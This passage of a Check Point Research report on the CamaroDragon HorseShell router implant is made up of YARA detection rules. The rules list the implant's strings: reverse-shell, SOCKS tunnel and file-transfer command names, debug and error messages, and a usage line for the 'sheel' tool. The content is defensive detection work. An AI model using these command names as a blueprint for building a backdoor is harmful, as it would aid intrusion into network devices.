succeed\" $debug_25 = \"file_transfer_data_request...cur_len=%d\" $debug_26 =\r\n\"file_transfer_data_request...SEND_RSP\" $debug_27 = \"file_transfer_data_request\" $debug_28 =\r\n\"file_transfer_delete_request\" $debug_29 = \"file_transfer_download_request\" $debug_30 =\r\n\"file_transfer_free_cb\" $debug_31 = \"file_transfer_info port %d already started!\" $debug_32 =\r\n\"file_transfer_process_connect_port\" $debug_33 = \"file_transfer_query_request\" $debug_34 =\r\n\"file_transfer_send_file_data\" $debug_35 = \"file_transfer_upload_request\" $debug_36 = \"find ipv4=%s, port=%d\r\nby lan success!\" $debug_37 = \"find_connected_port_relay_info\" $debug_38 = \"find_port_relay_info_by_lan\"\r\n$debug_39 = \"find_start_connect_port_relay_info\" $debug_40 = \"free file transfer info!\" $debug_41 =\r\n\"get_file_transfer_info_by_conn\" $debug_42 = \"get_file_transfer_info_by_port\" $debug_43 =\r\n\"get_free_port_relay_info\" $debug_44 = \"get_port_relay_info_from_list_by_port_relay_conn\" $debug_45 =\r\n\"get_socks_tun_info_from_list_by_conn\" $debug_46 = \"get_socks_tun_info_from_list_by_port\" $debug_47 =\r\n\"horse_shell_start\" $debug_48 = \"http online data length %d too long\" $debug_49 = \"http_rsp:%s\" $debug_50 =\r\n\"info-\u003estate=%d not connected!\" $debug_51 = \"invalid NATPORT_COMM_CMD_CONNECT\" $debug_52 =\r\n\"invalid NATPORT_COMM_CMD_DISCONNECT\" $debug_53 = \"malloc file transfer info!\" $debug_54 =\r\n\"neither cancel upload nor cancel download\" $debug_55 = \"not connected, begin to connect!\" $debug_56 = \"not\r\nenough sapce to malloc a port relay info!\" $debug_57 = \"other file transfer task oper %d\" $debug_58 = \"recv\r\ncheck file '%s' exists request, file %s\" $debug_59 = \"remove current task!\" $debug_60 =\r\n\"remove_file_transfer_info_from_list\" $debug_61 = \"reverse_shell can not find bash or sh\" $debug_62 = \"shell\r\ncreate connection to %s:%d succeed\" $debug_63 = \"shell create_shell_pty_session succeed!\" $debug_64 = \"shell\r\nprocess connect port cmd-\u003eport\" $debug_65 = \"shell_pty_session_free_cb, socket=%d\" $debug_66 = \"socks tun\r\nconnect lan\" $debug_67 = \"socks tun create connection %p to %s:%d succeed!\" $debug_68 = \"socks tun port %d\r\nalready opened!\" $debug_69 = \"socks tun process connect port\" $debug_70 = \"socks tun try connect lan\"\r\n$debug_71 = \"trans file create connection to %s:%d succeed!\" $debug_72 = \"trans_file_start\" $debug_73 =\r\n\"tun_info-\u003efree_list\" $debug_74 = \"tun_info-\u003eused_list\" $debug_75 = \"unkown file transfer sub cmd\" $debug_76\r\n= \"unkown socks tun sub cmd\" $debug_77 = \"shell_conn_session_connect_cb\" $debug_78 =\r\n\"shell_conn_session_free_cb\" $debug_79 = \"shell_get_body_from_http_rsp\" $debug_80 = \"shell_get_http_body\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 35 of 45\n\n$debug_81 = \"shell_get_http_filed\" // Commands $command_1 = \"SOCKS TUN REQ_CONNECT_PORT\"\r\n$command_2 = \"SOCKS TUN NATPORT_COMM_CMD_CONNECT\" $command_3 = \"SOCKS TUN\r\nNATPORT_COMM_CMD_OPEN\" $command_4 = \"SOCKS TUN NATPORT_COMM_CMD_DATA\"\r\n$command_5 = \"SOCKS TUN NATPORT_COMM_CMD_CLOSE\" $command_6 = \"SOCKS TUN\r\nNATPORT_COMM_CMD_DISCONNECT\" $command_7 = \"SOCKS TUN\r\nNATPORT_COMM_CMD_CHECK\" $command_8 = \"SOCKS TUN REQ_MODULE_HEARTBEAT\"\r\n$command_9 = \"NET_REQ_HORSE_SHELL REQ_CONNECT_PORT\" $command_10 = \"FILE_TRANSFER\r\nREQ_CONNECT_PORT\" $command_11 = \"FILE_TRANSFER_OPER_DOWNLOAD\" $command_12 =\r\n\"FILE_TRANSFER_OPER_UPLOAD\" $command_13 = \"FILE_TRANSFER_OPER_CANCEL_DOWNLOAD\"\r\n$command_14 = \"FILE_TRANSFER_OPER_CANCEL_UPLOAD\" $command_15 =\r\n\"FILE_TRANSFER_TRANS_FILE_DATA\" $command_16 = \"FILE_TRANSFER_OPER_DELETE\"\r\n$command_17 = \"FILE_TRANSFER_OPER_QUERY\" $command_18 =\r\n\"FILE_TRANSFER_OPER_CHECK_EXISTS\" $command_19 = \"REQ_MODULE_HEARTBEAT\" // Error\r\nstrings $error_1 = \" \u003e .remote_shell.log\" $error_2 = \"calloc mem for hall_device_online_req failed!\" $error_3 =\r\n\"conn_listening_conn bind sock=%d failed\" $error_4 = \"conn_listening_conn listen sock=%d failed\" $error_5 =\r\n\"conn_listening_conn set sock=%d address failed\" $error_6 = \"conn_listening_conn set sock=%d nonblock\r\nfailed\" $error_7 = \"conn_listening_conn set sock=%d reuse address failed\" $error_8 = \"conn_listening_conn set\r\nsock=%d tcp no delay failed\" $error_9 = \"conn_tcp_conn connect sock=%d failed,err=%d\" $error_10 =\r\n\"conn_tcp_conn set sock=%d address failed,err=%d\" $error_11 = \"conn_tcp_conn set sock=%d nonblock\r\nfailed,err=%d\" $error_12 = \"conn_tcp_conn set sock=%d reuse address failed,err=%d\" $error_13 =\r\n\"conn_tcp_conn set sock=%d tcp no delay failed,err=%d\" $error_14 = \"conn_udp_conn bind sock=%d failed\"\r\n$error_15 = \"conn_udp_conn set sock=%d address failed\" $error_16 = \"conn_udp_conn set sock=%d nonblock\r\nfailed\" $error_17 = \"conn_udp_conn set sock=%d reuse address failed\" $error_18 = \"create file_transfer_info\r\nfailed!\" $error_19 = \"create g_file_transfer_info_list failed!\" $error_20 = \"create g_socks_tun_list failed!\"\r\n$error_21 = \"create shell conn session failed!\" $error_22 = \"crypto_decrypt_buf error,\" $error_23 = \"delete\r\nfile:%s fialed\" $error_24 = \"disconnect this http conn\" $error_25 = \"download file %s failed, safe read length=%d\r\nfrom fd=%d failed, retlen=%d!\" $error_26 = \"file transfer download open file %s fialed!\" $error_27 = \"file\r\ntransfer process connect port failed, ret = %d!\" $error_28 = \"file transfer upload open file %s failed\" $error_29 =\r\n\"find connected ipv4_port ipv4=%s, port=%d failed!\" $error_30 = \"find connected port_relay_info ipv4=%s,\r\nport=%d failed!\" $error_31 = \"find ipv4=%s, port=%d by lan failed!\" $error_32 = \"get a free port_relay_info\r\nfailed , not enough sapce to save lan ipv4 and port\" $error_33 = \"http connect failed, errno=%d, reason=%s\"\r\n$error_34 = \"http data length %d too long\" $error_35 = \"init conf failed\" $error_36 = \"open fialed ret=%d\"\r\n$error_37 = \"peek http rsp failed!\" $error_38 = \"peek socks tun data from %s:%d sock=%d failed!\" $error_39 =\r\n\"read ip failed, %m\" $error_40 = \"resolve online domain failed\" $error_41 = \"send data to dst socket %d failed!\"\r\n$error_42 = \"send failed (sock=%d,err=%d)\" $error_43 = \"sendto failed (peer address=%s,err=%d)\" $error_45 =\r\n\"set socket opt failed, %m!\" $error_46 = \"shell create connection to %s:%d failed!\" $error_47 = \"shell\r\ncreate_shell_pty_session failed!\" $error_48 = \"shell process connect port failed, ret = %d!\" $error_49 = \"socks tun\r\nconnect lan '%s:%d' failed!\" $error_50 = \"socks tun create connection to %s:%d failed!\" $error_51 = \"socks tun\r\nport %d already opened!\" $error_52 = \"socks tun process connect port failed, ret = %d!\" $error_53 = \"socks tun\r\ntry connect lan '%s:%d' failed!\" $error_54 = \"socks_tun_connect_cb failed %p\" $error_55 = \"socks_tun_info_new\r\nfailed!\" $error_56 = \"start shell '%s' failed!\" $error_57 = \"tcp online create conn failed!\" $error_58 = \"tcp online\r\ncreate http_online_info_t failed!\" $error_59 = \"trans file create connection to %s:%d failed!\" $error_60 = \"try\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 36 of 45\n\nconnect failed\" $error_61 = \"try connect lan '%s:%d' failed!\" $error_62 = \"wzsw_init failed\" // function names\r\n$function_1 = \"shell_conn_session_connect_cb\" $function_2 = \"shell_conn_session_free_cb\" $function_3 =\r\n\"shell_get_body_from_http_rsp\" $function_4 = \"shell_get_http_body\" $function_5 = \"shell_get_http_filed\"\r\n$function_6 = \"send_file_transfer_conn_heart_beat\" $function_7 = \"send_file_transfer_http_data_net_packet\"\r\n$function_8 = \"send_horse_shell_http_data_net_packet\" $function_9 = \"send_module_heart_beat\" $function_10\r\n= \"send_socks_tun_cmd_info_packet\" $function_11 = \"send_socks_tun_conn_heart_beat\" $function_12 =\r\n\"send_socks_tun_http_data_net_packet\" $function_13 = \"send_socks_tun_net_packet\" $function_14 =\r\n\"send_socks_tun_status_packet\" $function_15 = \"socks_get_body_from_http_rsp\" $function_16 =\r\n\"socks_get_http_body\" $function_17 = \"socks_get_http_filed\" $function_18 = \"socks_tun_conn_cb\"\r\n$function_19 = \"socks_tun_conn_free_cb\" $function_20 = \"socks_tun_conn_lan_cb\" $function_21 =\r\n\"socks_tun_conn_lan_free_cb\" $function_22 = \"socks_tun_connect_cb\" $function_23 =\r\n\"socks_tun_connect_lan_cb\" $function_24 = \"socks_tun_info_free\" $function_25 = \"socks_tun_info_new\"\r\n$function_26 = \"socks_tun_process_check\" $function_27 = \"socks_tun_process_connect_port\" $function_28 =\r\n\"socks_tun_process_connect\" $function_29 = \"socks_tun_process_data\" $function_30 =\r\n\"socks_tun_process_disconnect\" $function_31 = \"socks_tun_process_open\" $function_32 = \"socks_tun_start\"\r\n$function_33 = \"socks_tun_try_connect_lan_port_cb\" $function_34 = \"check_file_transfer_conn_heart_beat\"\r\n$function_35 = \"check_socks_tun_conn_heart_beat\" $function_36 = \"conn_init_tcp_conn\" $function_37 =\r\n\"conn_marked_close\" $function_38 = \"conn_read_buffer_length\" $function_39 = \"conn_set_callback\"\r\n$function_40 = \"conn_set_free_callback\" $function_41 = \"conn_set_user_data\" $function_42 = \"conn_start_read\"\r\n$function_43 = \"conn_start_write\" $function_44 = \"conn_stop_write\" $function_45 = \"conn_tcp_conn\"\r\n$function_46 = \"conn_uninit_containers\" $function_47 = \"find_connected_port_relay_info\" $function_48 =\r\n\"find_port_relay_info_by_lan\" $function_49 = \"find_start_connect_port_relay_info\" $function_50 =\r\n\"get_free_port_relay_info\" $function_51 = \"get_port_relay_info_from_list_by_port_relay_conn\" $function_52 =\r\n\"get_port_relay_info\" $function_53 = \"horse_main\" $function_54 = \"process_dev_online\" $function_55 =\r\n\"process_http_read_events\" $function_56 = \"process_shell_conn_session_read_events\" $function_57 =\r\n\"process_shell_conn_session_write_events\" $function_58 = \"put_port_relay_info\" $function_59 =\r\n\"send_file_transfer_conn_heart_beat\" $function_60 = \"send_socks_tun_conn_heart_beat\" $function_61 =\r\n\"process_file_transfer_read_events\" $function_62 = \"process_file_transfer_write_events\" $function_63 =\r\n\"process_pty_conn_read_events\" $function_64 = \"process_pty_conn_write_events\" $function_65 =\r\n\"process_shell_conn_connect_port\" $function_66 = \"process_shell_conn_session_read_events\" $function_67 =\r\n\"process_shell_conn_session_write_events\" $function_68 = \"process_socks_tun_lan_conn_read_events\"\r\n$function_69 = \"process_socks_tun_read_events\" $function_70 = \"process_transfile_task\" $function_71 =\r\n\"put_port_relay_info\" $function_72 = \"socks_get_body_from_http_rsp\" $function_73 = \"socks_get_http_body\"\r\n$function_74 = \"socks_get_http_filed\" $function_75 = \"socks_tun_conn_cb\" $function_76 =\r\n\"socks_tun_conn_free_cb\" $function_77 = \"socks_tun_conn_lan_cb\" $function_78 =\r\n\"socks_tun_conn_lan_free_cb\" $function_79 = \"socks_tun_connect_cb\" $function_80 =\r\n\"socks_tun_connect_lan_cb\" $function_81 = \"socks_tun_info_free\" $function_82 = \"socks_tun_info_new\"\r\n$function_83 = \"socks_tun_process_check\" $function_84 = \"socks_tun_process_connect_port\" $function_85 =\r\n\"socks_tun_process_connect\" $function_86 = \"socks_tun_process_data\" $function_87 =\r\n\"socks_tun_process_disconnect\" $function_88 = \"socks_tun_process_open\" $function_89 = \"socks_tun_start\"\r\n$function_90 = \"socks_tun_try_connect_lan_port_cb\" // Globals $global_1 = \"g_socks_tun_list\" condition:\r\nfilesize \u003c 2MB and 3 of ($crypto_*) or 2 of ($filename_*) or 3 of ($debug_*) or any of ($command_*) or 3 of\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 37 of 45\n\n($error_*) or 3 of ($function_*) or $global_1 or 5 of them } rule apt_CN_CamaroDragon_sheel_strings { meta:\r\nauthor = \"Itay Cohen @ Check Point Research\" date = \"2023-04-01\" description = \"Detects CamaroDragon's\r\nsheel tool.\" hash = \"7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a\" reference = \"\"\r\nstrings: $ = \"write failed.open fail.\" $ = \"open fail.%m\" $ = \"./sheel -h server_ip -p server_port -i update_index[0-\r\n4] [-r]\" $ = \"./sheel -h\" $ = \"update server list success!\" condition: filesize \u003c 12KB and 3 of them }\r\nrule apt_CN_CamaroDragon_horseshell_strings {\r\nmeta:\r\nauthor = \"Itay Cohen @ Check Point Research\"\r\ndate = \"2023-04-01\"\r\ndescription = \"Detects CamaroDragon's HorseShell implant for routers based on embedde\r\nhash = \"998788472cb1502c03675a15a9f09b12f3877a5aeb687f891458a414b8e0d66c\"\r\nreference = \"\"\r\nstrings:\r\n// Crypto\r\n$crypto_1 = \"wzsw_srand\"\r\n$crypto_2 = \"wzsw_rand\"\r\n$crypto_3 = \"wzsw_init\"\r\n$crypto_4 = \"wzsw_crypto_free\"\r\n$crypto_5 = \"wzsw_crypto_new\"\r\n$crypto_6 = \"wzsw_encrypt_buf\"\r\n$crypto_7 = \"wzsw_crypto_reset\"\r\n// File names\r\n$filename_1 = \"common/wzsw_crypto.c\"\r\n$filename_2 = \"http/http_socks_tun.cc\"\r\n$filename_3 = \"http/http_trans_file.cc\"\r\n$filename_4 = \"http/http_horse_shell.cc\"\r\n$filename_5 = \"http/http_online.cc\"\r\n// Debug strings\r\n$debug_1 = \"add_file_transfer_info_to_list\"\r\n$debug_2 = \"before trans data need connect\"\r\n$debug_3 = \"before trans data need connect2\"\r\n$debug_4 = \"cancel current task!\"\r\n$debug_5 = \"cancel task from task list!\"\r\n$debug_6 = \"cancel task task id\"\r\n$debug_7 = \"check file file_type is %d, neither file nor dir !\"\r\n$debug_8 = \"check_file_transfer_conn_heart_beat\"\r\n$debug_9 = \"check_module_heart_beat\"\r\n$debug_10 = \"check_socks_tun_conn_heart_beat\"\r\n$debug_11 = \"conn_marked_close\"\r\n$debug_12 = \"conn_peek socket (sock=%d) closed\"\r\n$debug_13 = \"conn_peek socket (sock=%d) recv error,err=%d\"\r\n$debug_14 = \"conn_read socket (sock=%d) closed\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 38 of 45\n\n$debug_15 = \"conn_read socket (sock=%d) recv error,err=%d\"\r\n$debug_16 = \"conn_readfrom socket (sock=%d) recv error,err=%d\"\r\n$debug_17 = \"connect lan '%s:%d' in progress!\"\r\n$debug_18 = \"create_shell_conn_session\"\r\n$debug_19 = \"create_shell_pty_session\"\r\n$debug_20 = \"current task %p is not download!\"\r\n$debug_21 = \"file transfer download open file %s succeed!\"\r\n$debug_22 = \"file transfer oper %d neither download nor upload\"\r\n$debug_23 = \"file transfer process connect port cmd-\u003eport\"\r\n$debug_24 = \"file transfer upload open file %s succeed\"\r\n$debug_25 = \"file_transfer_data_request...cur_len=%d\"\r\n$debug_26 = \"file_transfer_data_request...SEND_RSP\"\r\n$debug_27 = \"file_transfer_data_request\"\r\n$debug_28 = \"file_transfer_delete_request\"\r\n$debug_29 = \"file_transfer_download_request\"\r\n$debug_30 = \"file_transfer_free_cb\"\r\n$debug_31 = \"file_transfer_info port %d already started!\"\r\n$debug_32 = \"file_transfer_process_connect_port\"\r\n$debug_33 = \"file_transfer_query_request\"\r\n$debug_34 = \"file_transfer_send_file_data\"\r\n$debug_35 = \"file_transfer_upload_request\"\r\n$debug_36 = \"find ipv4=%s, port=%d by lan success!\"\r\n$debug_37 = \"find_connected_port_relay_info\"\r\n$debug_38 = \"find_port_relay_info_by_lan\"\r\n$debug_39 = \"find_start_connect_port_relay_info\"\r\n$debug_40 = \"free file transfer info!\"\r\n$debug_41 = \"get_file_transfer_info_by_conn\"\r\n$debug_42 = \"get_file_transfer_info_by_port\"\r\n$debug_43 = \"get_free_port_relay_info\"\r\n$debug_44 = \"get_port_relay_info_from_list_by_port_relay_conn\"\r\n$debug_45 = \"get_socks_tun_info_from_list_by_conn\"\r\n$debug_46 = \"get_socks_tun_info_from_list_by_port\"\r\n$debug_47 = \"horse_shell_start\"\r\n$debug_48 = \"http online data length %d too long\"\r\n$debug_49 = \"http_rsp:%s\"\r\n$debug_50 = \"info-\u003estate=%d not connected!\"\r\n$debug_51 = \"invalid NATPORT_COMM_CMD_CONNECT\"\r\n$debug_52 = \"invalid NATPORT_COMM_CMD_DISCONNECT\"\r\n$debug_53 = \"malloc file transfer info!\"\r\n$debug_54 = \"neither cancel upload nor cancel download\"\r\n$debug_55 = \"not connected, begin to connect!\"\r\n$debug_56 = \"not enough sapce to malloc a port relay info!\"\r\n$debug_57 = \"other file transfer task oper %d\"\r\n$debug_58 = \"recv check file '%s' exists request, file %s\"\r\n$debug_59 = \"remove current task!\"\r\n$debug_60 = \"remove_file_transfer_info_from_list\"\r\n$debug_61 = \"reverse_shell can not find bash or sh\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 39 of 45\n\n$debug_62 = \"shell create connection to %s:%d succeed\"\r\n$debug_63 = \"shell create_shell_pty_session succeed!\"\r\n$debug_64 = \"shell process connect port cmd-\u003eport\"\r\n$debug_65 = \"shell_pty_session_free_cb, socket=%d\"\r\n$debug_66 = \"socks tun connect lan\"\r\n$debug_67 = \"socks tun create connection %p to %s:%d succeed!\"\r\n$debug_68 = \"socks tun port %d already opened!\"\r\n$debug_69 = \"socks tun process connect port\"\r\n$debug_70 = \"socks tun try connect lan\"\r\n$debug_71 = \"trans file create connection to %s:%d succeed!\"\r\n$debug_72 = \"trans_file_start\"\r\n$debug_73 = \"tun_info-\u003efree_list\"\r\n$debug_74 = \"tun_info-\u003eused_list\"\r\n$debug_75 = \"unkown file transfer sub cmd\"\r\n$debug_76 = \"unkown socks tun sub cmd\"\r\n$debug_77 = \"shell_conn_session_connect_cb\"\r\n$debug_78 = \"shell_conn_session_free_cb\"\r\n$debug_79 = \"shell_get_body_from_http_rsp\"\r\n$debug_80 = \"shell_get_http_body\"\r\n$debug_81 = \"shell_get_http_filed\"\r\n// Commands\r\n$command_1 = \"SOCKS TUN REQ_CONNECT_PORT\"\r\n$command_2 = \"SOCKS TUN NATPORT_COMM_CMD_CONNECT\"\r\n$command_3 = \"SOCKS TUN NATPORT_COMM_CMD_OPEN\"\r\n$command_4 = \"SOCKS TUN NATPORT_COMM_CMD_DATA\"\r\n$command_5 = \"SOCKS TUN NATPORT_COMM_CMD_CLOSE\"\r\n$command_6 = \"SOCKS TUN NATPORT_COMM_CMD_DISCONNECT\"\r\n$command_7 = \"SOCKS TUN NATPORT_COMM_CMD_CHECK\"\r\n$command_8 = \"SOCKS TUN REQ_MODULE_HEARTBEAT\"\r\n$command_9 = \"NET_REQ_HORSE_SHELL REQ_CONNECT_PORT\"\r\n$command_10 = \"FILE_TRANSFER REQ_CONNECT_PORT\"\r\n$command_11 = \"FILE_TRANSFER_OPER_DOWNLOAD\"\r\n$command_12 = \"FILE_TRANSFER_OPER_UPLOAD\"\r\n$command_13 = \"FILE_TRANSFER_OPER_CANCEL_DOWNLOAD\"\r\n$command_14 = \"FILE_TRANSFER_OPER_CANCEL_UPLOAD\"\r\n$command_15 = \"FILE_TRANSFER_TRANS_FILE_DATA\"\r\n$command_16 = \"FILE_TRANSFER_OPER_DELETE\"\r\n$command_17 = \"FILE_TRANSFER_OPER_QUERY\"\r\n$command_18 = \"FILE_TRANSFER_OPER_CHECK_EXISTS\"\r\n$command_19 = \"REQ_MODULE_HEARTBEAT\"\r\n// Error strings\r\n$error_1 = \" \u003e .remote_shell.log\"\r\n$error_2 = \"calloc mem for hall_device_online_req failed!\"\r\n$error_3 = \"conn_listening_conn bind sock=%d failed\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 40 of 45\n\n$error_4 = \"conn_listening_conn listen sock=%d failed\"\r\n$error_5 = \"conn_listening_conn set sock=%d address failed\"\r\n$error_6 = \"conn_listening_conn set sock=%d nonblock failed\"\r\n$error_7 = \"conn_listening_conn set sock=%d reuse address failed\"\r\n$error_8 = \"conn_listening_conn set sock=%d tcp no delay failed\"\r\n$error_9 = \"conn_tcp_conn connect sock=%d failed,err=%d\"\r\n$error_10 = \"conn_tcp_conn set sock=%d address failed,err=%d\"\r\n$error_11 = \"conn_tcp_conn set sock=%d nonblock failed,err=%d\"\r\n$error_12 = \"conn_tcp_conn set sock=%d reuse address failed,err=%d\"\r\n$error_13 = \"conn_tcp_conn set sock=%d tcp no delay failed,err=%d\"\r\n$error_14 = \"conn_udp_conn bind sock=%d failed\"\r\n$error_15 = \"conn_udp_conn set sock=%d address failed\"\r\n$error_16 = \"conn_udp_conn set sock=%d nonblock failed\"\r\n$error_17 = \"conn_udp_conn set sock=%d reuse address failed\"\r\n$error_18 = \"create file_transfer_info failed!\"\r\n$error_19 = \"create g_file_transfer_info_list failed!\"\r\n$error_20 = \"create g_socks_tun_list failed!\"\r\n$error_21 = \"create shell conn session failed!\"\r\n$error_22 = \"crypto_decrypt_buf error,\"\r\n$error_23 = \"delete file:%s fialed\"\r\n$error_24 = \"disconnect this http conn\"\r\n$error_25 = \"download file %s failed, safe read length=%d from fd=%d failed, retlen=%\r\n$error_26 = \"file transfer download open file %s fialed!\"\r\n$error_27 = \"file transfer process connect port failed, ret = %d!\"\r\n$error_28 = \"file transfer upload open file %s failed\"\r\n$error_29 = \"find connected ipv4_port ipv4=%s, port=%d failed!\"\r\n$error_30 = \"find connected port_relay_info ipv4=%s, port=%d failed!\"\r\n$error_31 = \"find ipv4=%s, port=%d by lan failed!\"\r\n$error_32 = \"get a free port_relay_info failed , not enough sapce to save lan ipv4 a\r\n$error_33 = \"http connect failed, errno=%d, reason=%s\"\r\n$error_34 = \"http data length %d too long\"\r\n$error_35 = \"init conf failed\"\r\n$error_36 = \"open fialed ret=%d\"\r\n$error_37 = \"peek http rsp failed!\"\r\n$error_38 = \"peek socks tun data from %s:%d sock=%d failed!\"\r\n$error_39 = \"read ip failed, %m\"\r\n$error_40 = \"resolve online domain failed\"\r\n$error_41 = \"send data to dst socket %d failed!\"\r\n$error_42 = \"send failed (sock=%d,err=%d)\"\r\n$error_43 = \"sendto failed (peer address=%s,err=%d)\"\r\n$error_45 = \"set socket opt failed, %m!\"\r\n$error_46 = \"shell create connection to %s:%d failed!\"\r\n$error_47 = \"shell create_shell_pty_session failed!\"\r\n$error_48 = \"shell process connect port failed, ret = %d!\"\r\n$error_49 = \"socks tun connect lan '%s:%d' failed!\"\r\n$error_50 = \"socks tun create connection to %s:%d failed!\"\r\n$error_51 = \"socks tun port %d already opened!\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 41 of 45\n\n$error_52 = \"socks tun process connect port failed, ret = %d!\"\r\n$error_53 = \"socks tun try connect lan '%s:%d' failed!\"\r\n$error_54 = \"socks_tun_connect_cb failed %p\"\r\n$error_55 = \"socks_tun_info_new failed!\"\r\n$error_56 = \"start shell '%s' failed!\"\r\n$error_57 = \"tcp online create conn failed!\"\r\n$error_58 = \"tcp online create http_online_info_t failed!\"\r\n$error_59 = \"trans file create connection to %s:%d failed!\"\r\n$error_60 = \"try connect failed\"\r\n$error_61 = \"try connect lan '%s:%d' failed!\"\r\n$error_62 = \"wzsw_init failed\"\r\n// function names\r\n$function_1 = \"shell_conn_session_connect_cb\"\r\n$function_2 = \"shell_conn_session_free_cb\"\r\n$function_3 = \"shell_get_body_from_http_rsp\"\r\n$function_4 = \"shell_get_http_body\"\r\n$function_5 = \"shell_get_http_filed\"\r\n$function_6 = \"send_file_transfer_conn_heart_beat\"\r\n$function_7 = \"send_file_transfer_http_data_net_packet\"\r\n$function_8 = \"send_horse_shell_http_data_net_packet\"\r\n$function_9 = \"send_module_heart_beat\"\r\n$function_10 = \"send_socks_tun_cmd_info_packet\"\r\n$function_11 = \"send_socks_tun_conn_heart_beat\"\r\n$function_12 = \"send_socks_tun_http_data_net_packet\"\r\n$function_13 = \"send_socks_tun_net_packet\"\r\n$function_14 = \"send_socks_tun_status_packet\"\r\n$function_15 = \"socks_get_body_from_http_rsp\"\r\n$function_16 = \"socks_get_http_body\"\r\n$function_17 = \"socks_get_http_filed\"\r\n$function_18 = \"socks_tun_conn_cb\"\r\n$function_19 = \"socks_tun_conn_free_cb\"\r\n$function_20 = \"socks_tun_conn_lan_cb\"\r\n$function_21 = \"socks_tun_conn_lan_free_cb\"\r\n$function_22 = \"socks_tun_connect_cb\"\r\n$function_23 = \"socks_tun_connect_lan_cb\"\r\n$function_24 = \"socks_tun_info_free\"\r\n$function_25 = \"socks_tun_info_new\"\r\n$function_26 = \"socks_tun_process_check\"\r\n$function_27 = \"socks_tun_process_connect_port\"\r\n$function_28 = \"socks_tun_process_connect\"\r\n$function_29 = \"socks_tun_process_data\"\r\n$function_30 = \"socks_tun_process_disconnect\"\r\n$function_31 = \"socks_tun_process_open\"\r\n$function_32 = \"socks_tun_start\"\r\n$function_33 = \"socks_tun_try_connect_lan_port_cb\"\r\n$function_34 = \"check_file_transfer_conn_heart_beat\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 42 of 45\n\n$function_35 = \"check_socks_tun_conn_heart_beat\"\r\n$function_36 = \"conn_init_tcp_conn\"\r\n$function_37 = \"conn_marked_close\"\r\n$function_38 = \"conn_read_buffer_length\"\r\n$function_39 = \"conn_set_callback\"\r\n$function_40 = \"conn_set_free_callback\"\r\n$function_41 = \"conn_set_user_data\"\r\n$function_42 = \"conn_start_read\"\r\n$function_43 = \"conn_start_write\"\r\n$function_44 = \"conn_stop_write\"\r\n$function_45 = \"conn_tcp_conn\"\r\n$function_46 = \"conn_uninit_containers\"\r\n$function_47 = \"find_connected_port_relay_info\"\r\n$function_48 = \"find_port_relay_info_by_lan\"\r\n$function_49 = \"find_start_connect_port_relay_info\"\r\n$function_50 = \"get_free_port_relay_info\"\r\n$function_51 = \"get_port_relay_info_from_list_by_port_relay_conn\"\r\n$function_52 = \"get_port_relay_info\"\r\n$function_53 = \"horse_main\"\r\n$function_54 = \"process_dev_online\"\r\n$function_55 = \"process_http_read_events\"\r\n$function_56 = \"process_shell_conn_session_read_events\"\r\n$function_57 = \"process_shell_conn_session_write_events\"\r\n$function_58 = \"put_port_relay_info\"\r\n$function_59 = \"send_file_transfer_conn_heart_beat\"\r\n$function_60 = \"send_socks_tun_conn_heart_beat\"\r\n$function_61 = \"process_file_transfer_read_events\"\r\n$function_62 = \"process_file_transfer_write_events\"\r\n$function_63 = \"process_pty_conn_read_events\"\r\n$function_64 = \"process_pty_conn_write_events\"\r\n$function_65 = \"process_shell_conn_connect_port\"\r\n$function_66 = \"process_shell_conn_session_read_events\"\r\n$function_67 = \"process_shell_conn_session_write_events\"\r\n$function_68 = \"process_socks_tun_lan_conn_read_events\"\r\n$function_69 = \"process_socks_tun_read_events\"\r\n$function_70 = \"process_transfile_task\"\r\n$function_71 = \"put_port_relay_info\"\r\n$function_72 = \"socks_get_body_from_http_rsp\"\r\n$function_73 = \"socks_get_http_body\"\r\n$function_74 = \"socks_get_http_filed\"\r\n$function_75 = \"socks_tun_conn_cb\"\r\n$function_76 = \"socks_tun_conn_free_cb\"\r\n$function_77 = \"socks_tun_conn_lan_cb\"\r\n$function_78 = \"socks_tun_conn_lan_free_cb\"\r\n$function_79 = \"socks_tun_connect_cb\"\r\n$function_80 = \"socks_tun_connect_lan_cb\"\r\n$function_81 = \"socks_tun_info_free\"\r\nhttps://research.checkpoint.com/2023/the-dragon-who-sold-his-camaro-analyzing-custom-router-implant/\r\nPage 43 of 45\n\n$function_82 = \"socks_tun_info_new\"\r\n$function_83 = \"socks_tun_process_check\"\r\n$function_84 = \"socks_tun_process_connect_port\"\r\n$function_85 = \"socks_tun_process_connect\"\r\n$function_86 = \"socks_tun_process_data\"\r\n$function_87 = \"socks_tun_process_disconnect\"\r\n$function_88 = \"socks_tun_process_open\"\r\n$function_89 = \"socks_tun_start\"\r\n$function_90 = \"socks_tun_try_connect_lan_port_cb\"\r\n// Globals\r\n$global_1 = \"g_socks_tun_list\"\r\ncondition:\r\nfilesize \u003c 2MB and\r\n3 of ($crypto_*) or\r\n2 of ($filename_*) or\r\n3 of ($debug_*) or\r\nany of ($command_*) or\r\n3 of ($error_*) or\r\n3 of ($function_*) or\r\n$global_1 or\r\n5 of them\r\n}\r\nrule apt_CN_CamaroDragon_sheel_strings {\r\nmeta:\r\nauthor = \"Itay Cohen @ Check Point Research\"\r\ndate = \"2023-04-01\"\r\ndescription = \"Detects CamaroDragon's sheel tool.\"\r\nhash = \"7985f992dcc6fcce76ee2892700c8538af075bd991625156bf2482dbfebd5a5a\"\r\nreference = \"\"\r\nstrings:\r\n$ = \"write failed.open fail.\"\r\n$ = \"open fail.%m\"\r\n$ = \"./sheel -h server_ip -p server_port -i update_index[0-4] [-r]\"\r\n$ = \"./sheel -h\"\r\n$ = \"update server list success!\"\r\ncondition:\r\nfilesize \u003c 12KB and\r\n3 of 